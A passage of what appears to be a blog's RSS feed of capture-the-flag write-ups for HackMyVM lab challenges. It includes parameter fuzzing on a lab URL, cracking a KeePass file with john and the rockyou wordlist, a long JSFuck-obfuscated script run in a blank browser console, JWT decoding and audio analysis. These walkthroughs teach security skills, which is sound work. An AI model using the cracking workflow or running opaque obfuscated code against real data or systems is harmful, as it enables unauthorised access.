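    print(parse_bech32("BC1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KV8F3T4"))
```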

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20044.html</guid><pubDate>Tue, 17 Jun 2025 04:56:07 +0000</pubDate></item><item><title>Challenge 043</title><link>https://7r1UMPH.github.io/post/Challenge%20043.html</link><description>![image-20250617121018302](https://7r1umph.top/image/20250617121018691.webp)

Capture the flag from this MS Excel file.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20043.html</guid><pubDate>Tue, 17 Jun 2025 04:55:58 +0000</pubDate></item><item><title>Challenge 042</title><link>https://7r1UMPH.github.io/post/Challenge%20042.html</link><description>![image-20250617113152195](https://7r1umph.top/image/20250617113152556.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/n1lsfr4hm/
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 17 Jun 2025 04:02:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive


&lt;a href='/index.php?user=1'&gt;John&lt;/a&gt;
&lt;a href='/index.php?user=2'&gt;Monroe&lt;/a&gt;
&lt;a href='/index.php?user=3'&gt;Vault&lt;/a&gt;
&lt;a href='/index.php?user=4'&gt;{&lt;/a&gt;
&lt;a href='/index.php?user=6'&gt;Wesley&lt;/a&gt;
&lt;a href='/index.php?user=7'&gt;Teresa&lt;/a&gt;
&lt;a href='/index.php?user=8'&gt;Fredric&lt;/a&gt;
&lt;a href='/index.php?user=9'&gt;}&lt;/a&gt;
                            
```

5 is missing.

Let's visit it.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/n1lsfr4hm/index.php?user=5
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 17 Jun 2025 04:03:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive


&lt;a href='/index.php?user=1'&gt;John&lt;/a&gt;
&lt;a href='/index.php?user=2'&gt;Monroe&lt;/a&gt;
&lt;a href='/index.php?user=3'&gt;Vault&lt;/a&gt;
&lt;a href='/index.php?user=4'&gt;{&lt;/a&gt;
&lt;a href='/index.php?user=6'&gt;Wesley&lt;/a&gt;
&lt;a href='/index.php?user=7'&gt;Teresa&lt;/a&gt;
&lt;a href='/index.php?user=8'&gt;Fredric&lt;/a&gt;
&lt;a href='/index.php?user=9'&gt;}&lt;/a&gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;o_O                                                                                  
```

No hint, so just try values.

10: nothing.

11-20: tells us there is no way.

0: nothing.

-1 shows the flag.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/n1lsfr4hm/index.php?user=-1
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 17 Jun 2025 04:08:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive


&lt;a href='/index.php?user=1'&gt;John&lt;/a&gt;
&lt;a href='/index.php?user=2'&gt;Monroe&lt;/a&gt;
&lt;a href='/index.php?user=3'&gt;Vault&lt;/a&gt;
&lt;a href='/index.php?user=4'&gt;{&lt;/a&gt;
&lt;a href='/index.php?user=6'&gt;Wesley&lt;/a&gt;
&lt;a href='/index.php?user=7'&gt;Teresa&lt;/a&gt;
&lt;a href='/index.php?user=8'&gt;Fredric&lt;/a&gt;
&lt;a href='/index.php?user=9'&gt;}&lt;/a&gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;HMV{fcknumbers}                                                                                                                                                                                   
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20042.html</guid><pubDate>Tue, 17 Jun 2025 04:55:49 +0000</pubDate></item><item><title>Challenge 041</title><link>https://7r1UMPH.github.io/post/Challenge%20041.html</link><description>![image-20250617112622882](https://7r1umph.top/image/20250617112623238.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 041.zip 
-rwxr-xr-x 1 kali kali 1824 Jun 16 23:26 041.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 041.zip 
Archive:  041.zip
 extracting: Challenge.kdbx          
               
```

A **KeePass** database file.

Presumably we need to crack the password.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ keepass2john Challenge.kdbx &gt; hash    
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 2542373 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
amigos           (Challenge)     
1g 0:00:00:51 DONE (2025-06-16 23:29) 0.01944g/s 9.953p/s 9.953c/s 9.953C/s teiubesc..letmein
Use the '--show' option to display all of the cracked passwords reliably
Session completed. 
                      
```

Install a KeePass client.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ sudo apt install keepassxc
```

![image-20250617113119656](https://7r1umph.top/image/20250617113120073.webp)

```
HMV{EasyPeasyMoney}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20041.html</guid><pubDate>Tue, 17 Jun 2025 04:55:39 +0000</pubDate></item><item><title>Challenge 040</title><link>https://7r1UMPH.github.io/post/Challenge%20040.html</link><description>![image-20250617112222809](https://7r1umph.top/image/20250617112223147.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 040.zip 
-rwxr-xr-x 1 kali kali 528 Jun 16 23:22 040.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 040.zip 
Archive:  040.zip
  inflating: 040.txt                 
                  
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat -A 040.txt      
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]
+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[
]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!
+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]
[[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])())                                                                                                             
```

This is a JavaScript coding style called **JSFuck**: the whole program is spelled out with only the six characters `[]()!+`, and it still does whatever the original script did, so treat it as untrusted code. Pasting it into a browser console and running it is enough, as long as that console belongs to an empty page rather than to a site you are logged into.

Open about:blank in the browser and run it in that page's console

![image-20250617112545976](https://7r1umph.top/image/20250617112546424.webp)

```
HMV{jslovesxss}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20040.html</guid><pubDate>Tue, 17 Jun 2025 04:55:26 +0000</pubDate></item><item><title>Challenge 039</title><link>https://7r1UMPH.github.io/post/Challenge%20039.html</link><description>![image-20250617111915057](https://7r1umph.top/image/20250617111922673.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 039.zip 
Archive:  039.zip
  inflating: Challenge.txt           
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat Challenge.txt 
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImZsYWciOiJEb05vdFN0b3JlU2Vuc2l0aXZlRGF0YUhlcmUiLCJpYXQiOjE2OTQ0MTk4ODMsImV4cCI6MTY5NDQyMzQ4M30.GZ29CTL0ggEb7ZNvZU7HjeXKWUdco8uLvEbHdpW0DODJQ74IvOPJsoxhL1o5aOq_GLEoOH4vU9fa9kn67zbJcQyr8kjAojX_oVUHyjH4q0UHVASPGgtZMAASUz84TAiX3AWnKFDsgPKumEas01R1CdOv3HVwfU5az5m45D8TPyBB7JxXQdLZyDIIbq4G8fGVUtj3F9oi96d2AzZrpYb8aGyOMsLeDA2wFXSkLQo--6BsY6zOAgsPNVkjrK5jWVXYuvS4U2SnsIp3Gq6vS6rPv4B4qvcBE5-RJ__ZcPg-eZJF-OJzQ9DlKpRE0wg3dzRJWcqTlp6q1Nbk9VQnHc_lUg                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat -A Challenge.txt 
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImZsYWciOiJEb05vdFN0b3JlU2Vuc2l0aXZlRGF0YUhlcmUiLCJpYXQiOjE2OTQ0MTk4ODMsImV4cCI6MTY5NDQyMzQ4M30.GZ29CTL0ggEb7ZNvZU7HjeXKWUdco8uLvEbHdpW0DODJQ74IvOPJsoxhL1o5aOq_GLEoOH4vU9fa9kn67zbJcQyr8kjAojX_oVUHyjH4q0UHVASPGgtZMAASUz84TAiX3AWnKFDsgPKumEas01R1CdOv3HVwfU5az5m45D8TPyBB7JxXQdLZyDIIbq4G8fGVUtj3F9oi96d2AzZrpYb8aGyOMsLeDA2wFXSkLQo--6BsY6zOAgsPNVkjrK5jWVXYuvS4U2SnsIp3Gq6vS6rPv4B4qvcBE5-RJ__ZcPg-eZJF-OJzQ9DlKpRE0wg3dzRJWcqTlp6q1Nbk9VQnHc_lUg                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ xxd Challenge.txt 
00000000: 6579 4a30 6558 4169 4f69 4a4b 5631 5169  eyJ0eXAiOiJKV1Qi
00000010: 4c43 4a68 6247 6369 4f69 4a53 557a 5578  LCJhbGciOiJSUzUx
00000020: 4d69 4a39 2e65 794a 7a64 5749 694f 6949  MiJ9.eyJzdWIiOiI
00000030: 784d 6a4d 304e 5459 334f 446b 7749 6977  xMjM0NTY3ODkwIiw
00000040: 6962 6d46 745a 5349 3649 6b70 7661 4734  ibmFtZSI6IkpvaG4
00000050: 6752 4739 6c49 6977 6959 5752 7461 5734  gRG9lIiwiYWRtaW4
00000060: 694f 6e52 7964 5755 7349 6d5a 7359 5763  iOnRydWUsImZsYWc
00000070: 694f 694a 4562 3035 7664 464e 3062 334a  iOiJEb05vdFN0b3J
00000080: 6c55 3256 7563 326c 3061 585a 6c52 4746  lU2Vuc2l0aXZlRGF
00000090: 3059 5568 6c63 6d55 694c 434a 7059 5851  0YUhlcmUiLCJpYXQ
000000a0: 694f 6a45 324f 5451 304d 546b 344f 444d  iOjE2OTQ0MTk4ODM
000000b0: 7349 6d56 3463 4349 364d 5459 354e 4451  sImV4cCI6MTY5NDQ
000000c0: 794d 7a51 344d 3330 2e47 5a32 3943 544c  yMzQ4M30.GZ29CTL
000000d0: 3067 6745 6237 5a4e 765a 5537 486a 6558  0ggEb7ZNvZU7HjeX
000000e0: 4b57 5564 636f 3875 4c76 4562 4864 7057  KWUdco8uLvEbHdpW
000000f0: 3044 4f44 4a51 3734 4976 4f50 4a73 6f78  0DODJQ74IvOPJsox
00000100: 684c 316f 3561 4f71 5f47 4c45 6f4f 4834  hL1o5aOq_GLEoOH4
00000110: 7655 3966 6139 6b6e 3637 7a62 4a63 5179  vU9fa9kn67zbJcQy
00000120: 7238 6b6a 416f 6a58 5f6f 5655 4879 6a48  r8kjAojX_oVUHyjH
00000130: 3471 3055 4856 4153 5047 6774 5a4d 4141  4q0UHVASPGgtZMAA
00000140: 5355 7a38 3454 4169 5833 4157 6e4b 4644  SUz84TAiX3AWnKFD
00000150: 7367 504b 756d 4561 7330 3152 3143 644f  sgPKumEas01R1CdO
00000160: 7633 4856 7766 5535 617a 356d 3435 4438  v3HVwfU5az5m45D8
00000170: 5450 7942 4237 4a78 5851 644c 5a79 4449  TPyBB7JxXQdLZyDI
00000180: 4962 7134 4738 6647 5655 746a 3346 396f  Ibq4G8fGVUtj3F9o
00000190: 6939 3664 3241 7a5a 7270 5962 3861 4779  i96d2AzZrpYb8aGy
000001a0: 4f4d 734c 6544 4132 7746 5853 6b4c 516f  OMsLeDA2wFXSkLQo
000001b0: 2d2d 3642 7359 367a 4f41 6773 504e 566b  --6BsY6zOAgsPNVk
000001c0: 6a72 4b35 6a57 5658 5975 7653 3455 3253  jrK5jWVXYuvS4U2S
000001d0: 6e73 4970 3347 7136 7653 3672 5076 3442  nsIp3Gq6vS6rPv4B
000001e0: 3471 7663 4245 352d 524a 5f5f 5a63 5067  4qvcBE5-RJ__ZcPg
000001f0: 2d65 5a4a 462d 4f4a 7a51 3944 6c4b 7052  -eZJF-OJzQ9DlKpR
00000200: 4530 7767 3364 7a52 4a57 6371 546c 7036  E0wg3dzRJWcqTlp6
00000210: 7131 4e62 6b39 5651 6e48 635f 6c55 67    q1Nbk9VQnHc_lUg
                                                                        
```

https://gchq.github.io/CyberChef/

![image-20250617112131776](https://7r1umph.top/image/20250617112132131.webp)

```
HMV{DoNotStoreSensitiveDataHere}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20039.html</guid><pubDate>Tue, 17 Jun 2025 04:55:15 +0000</pubDate></item><item><title>Challenge 038</title><link>https://7r1UMPH.github.io/post/Challenge%20038.html</link><description>Revision is getting a bit boring, so let's do a few Challenges

![image-20250616113539463](https://7r1umph.top/image/20250616113547236.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 038.zip 
-rwxr-xr-x 1 kali kali 15093 Jun 15 23:36 038.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 038.zip 
Archive:  038.zip
  inflating: 038.mp3                 
                    
```

Very fast gibberish, haha

Try slowing it down (Audacity); download it if you don't have it

https://www.audacityteam.org/

Played back at roughly 0.2x speed you can hear it spelling out letters (Effect &gt; Pitch and Tempo &gt; Change Speed and Pitch)

But it's still hard to make out what it's saying, so export it

Since I have a speech-to-text model downloaded on my machine, I just used that; you could feed it to an AI or something similar

![image-20250616124822537](https://7r1umph.top/image/20250616124822922.webp)

```
HMV{hacktheplanet}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20038.html</guid><pubDate>Tue, 17 Jun 2025 04:55:02 +0000</pubDate></item><item><title>Challenge 037</title><link>https://7r1UMPH.github.io/post/Challenge%20037.html</link><description>![image-20250614105743955](https://7r1umph.top/image/20250614105744262.webp)

Street View hunting again

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 037.zip 
-rwxr-xr-x 1 kali kali 6256698 Jun 13 22:57 037.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 037.zip 
Archive:  037.zip
  inflating: osint.jpg               
             
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ exiftool osint.jpg 
ExifTool Version Number         : 13.25
File Name                       : osint.jpg
Directory                       : .
File Size                       : 6.3 MB
File Modification Date/Time     : 2023:07:17 21:14:46-04:00
File Access Date/Time           : 2025:06:13 22:58:07-04:00
File Inode Change Date/Time     : 2023:07:17 21:14:46-04:00
File Permissions                : -rwxr-xr-x
File Type                       : JPEG
